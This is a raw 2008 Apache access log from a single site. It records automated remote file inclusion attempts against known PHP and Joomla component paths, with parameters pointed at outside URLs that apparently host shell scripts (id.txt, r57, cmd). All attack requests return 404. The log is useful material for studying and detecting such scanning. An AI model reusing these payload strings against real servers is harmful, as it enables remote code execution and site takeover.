77.222.128.242 - - [22/Feb/2008:06:41:14 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [22/Feb/2008:06:41:45 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [22/Feb/2008:06:41:45 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [22/Feb/2008:06:41:46 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:06:42:58 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:06:44:08 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:06:44:41 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:06:44:42 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:06:44:43 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.14.187.140 - - [22/Feb/2008:06:45:08 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
61.14.187.140 - - [22/Feb/2008:06:45:08 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
61.14.187.140 - - [22/Feb/2008:06:45:09 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
61.14.187.140 - - [22/Feb/2008:06:45:09 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
61.14.187.140 - - [22/Feb/2008:06:45:09 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
61.14.187.140 - - [22/Feb/2008:06:45:09 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:06:45:17 -0800] "GET //class/class.dashboard_lms.php?where_framework=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:06:45:17 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.193.248.204 - - [22/Feb/2008:06:45:28 -0800] "GET /index.php?log=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:06:45:36 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:06:45:36 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:06:45:37 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:06:45:58 -0800] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:06:46:01 -0800] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.6.27.112 - - [22/Feb/2008:06:46:18 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.165 - - [22/Feb/2008:06:46:18 -0800] "GET /logs/access_080117.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.226.79.133 - - [22/Feb/2008:06:46:43 -0800] "GET //skin/zero_vote/error.php?dir=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.189.208.72 - - [22/Feb/2008:06:46:52 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
218.189.208.72 - - [22/Feb/2008:06:46:52 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
218.189.208.72 - - [22/Feb/2008:06:46:53 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
218.189.208.72 - - [22/Feb/2008:06:46:53 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
218.189.208.72 - - [22/Feb/2008:06:46:53 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
218.189.208.72 - - [22/Feb/2008:06:46:53 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
158.38.0.218 - - [22/Feb/2008:06:46:58 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
158.38.0.218 - - [22/Feb/2008:06:46:58 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
158.38.0.218 - - [22/Feb/2008:06:46:58 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.0" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
158.38.0.218 - - [22/Feb/2008:06:46:58 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.0" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
158.38.0.218 - - [22/Feb/2008:06:46:59 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
158.38.0.218 - - [22/Feb/2008:06:46:59 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:06:47:00 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:06:47:00 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
75.126.19.18 - - [22/Feb/2008:06:47:24 -0800] "GET /logs/access.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
75.126.19.18 - - [22/Feb/2008:06:47:29 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
75.126.19.18 - - [22/Feb/2008:06:47:34 -0800] "GET /logs/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.221.130.5 - - [22/Feb/2008:06:47:55 -0800] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [22/Feb/2008:06:47:55 -0800] "GET //class/class.dashboard_lms.php?where_framework=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [22/Feb/2008:06:47:56 -0800] "GET /logs//class/class.dashboard_lms.php?where_framework=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:06:47:59 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:06:48:00 -0800] "GET /logs/access.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:06:48:00 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:06:48:00 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:06:48:01 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:06:48:01 -0800] "GET /logs/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
160.78.48.55 - - [22/Feb/2008:06:48:01 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=%034[%0312Te4M%038@%0314Kr4VcuX%034]%03? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
160.78.48.55 - - [22/Feb/2008:06:48:31 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.iseeproject.org/cms/administrator/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
160.78.48.55 - - [22/Feb/2008:06:48:31 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.iseeproject.org/cms/administrator/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
160.78.48.55 - - [22/Feb/2008:06:48:31 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.iseeproject.org/cms/administrator/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
204.92.122.250 - - [22/Feb/2008:06:48:42 -0800] "GET /logs/access_071225.log/index.php?log=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.122.250 - - [22/Feb/2008:06:48:42 -0800] "GET /logs/index.php?log=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.143.84.82 - - [22/Feb/2008:06:48:59 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.78.48.55 - - [22/Feb/2008:06:49:14 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=%034[%0312Te4M%038@%0314Kr4VcuX%034]%03? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.222.128.242 - - [22/Feb/2008:06:49:36 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.190.12 - - [22/Feb/2008:06:50:07 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [22/Feb/2008:06:50:08 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [22/Feb/2008:06:50:10 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [22/Feb/2008:06:50:42 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.239.10.63 - - [22/Feb/2008:06:50:46 -0800] "GET /logs/access_080131.log/index2.php?page=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.239.10.63 - - [22/Feb/2008:06:50:47 -0800] "GET /index2.php?page=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.239.10.63 - - [22/Feb/2008:06:50:47 -0800] "GET /logs/index2.php?page=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.78.48.55 - - [22/Feb/2008:06:50:50 -0800] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.iseeproject.org/cms/administrator/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.208.120 - - [22/Feb/2008:06:50:57 -0800] "GET /logs/access_071225.log/index.php?log=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [22/Feb/2008:06:50:58 -0800] "GET /logs/index.php?log=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.99.250 - - [22/Feb/2008:06:51:26 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.99.250 - - [22/Feb/2008:06:51:27 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [22/Feb/2008:06:52:09 -0800] "GET /logs/access_080117.log//login.php?dir=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [22/Feb/2008:06:52:09 -0800] "GET /logs//login.php?dir=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.58.146 - - [22/Feb/2008:06:52:10 -0800] "GET /logs/access_080117.log//login.php?dir=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.58.146 - - [22/Feb/2008:06:52:10 -0800] "GET /logs//login.php?dir=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [22/Feb/2008:06:52:10 -0800] "GET /logs/access_080211.log//login.php?dir=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.58.146 - - [22/Feb/2008:06:52:11 -0800] "GET /logs/access_080211.log//login.php?dir=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [22/Feb/2008:06:52:20 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [22/Feb/2008:06:52:21 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [22/Feb/2008:06:52:21 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.116.173.131 - - [22/Feb/2008:06:53:48 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [22/Feb/2008:06:53:48 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [22/Feb/2008:06:53:49 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [22/Feb/2008:06:53:49 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:06:54:08 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:06:54:08 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:06:54:08 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:06:55:01 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:06:55:02 -0800] "GET /logs/access_080129.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:06:55:02 -0800] "GET //skin/zero_vote/error.php?dir=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:06:55:02 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:06:55:03 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:06:55:03 -0800] "GET /logs/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
63.247.139.144 - - [22/Feb/2008:06:56:29 -0800] "GET /logs/access_071228.log/config.php?path_to_root=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [22/Feb/2008:06:56:29 -0800] "GET /config.php?path_to_root=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [22/Feb/2008:06:56:30 -0800] "GET /logs/config.php?path_to_root=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [22/Feb/2008:06:56:31 -0800] "GET /logs/access_080101.log/config.php?path_to_root=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.160.222.81 - - [22/Feb/2008:06:56:56 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [22/Feb/2008:06:56:57 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [22/Feb/2008:06:56:57 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [22/Feb/2008:06:56:57 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.116.154 - - [22/Feb/2008:06:57:24 -0800] "GET /logs/access_071229.log HTTP/1.1" 200 314379 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
62.193.248.204 - - [22/Feb/2008:06:57:25 -0800] "GET /logs/access_071225.log/index.php?log=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.204 - - [22/Feb/2008:06:57:26 -0800] "GET /logs/index.php?log=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.160.33.164 - - [22/Feb/2008:06:57:27 -0800] "GET /logs/access_080201.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.33.164 - - [22/Feb/2008:06:57:27 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
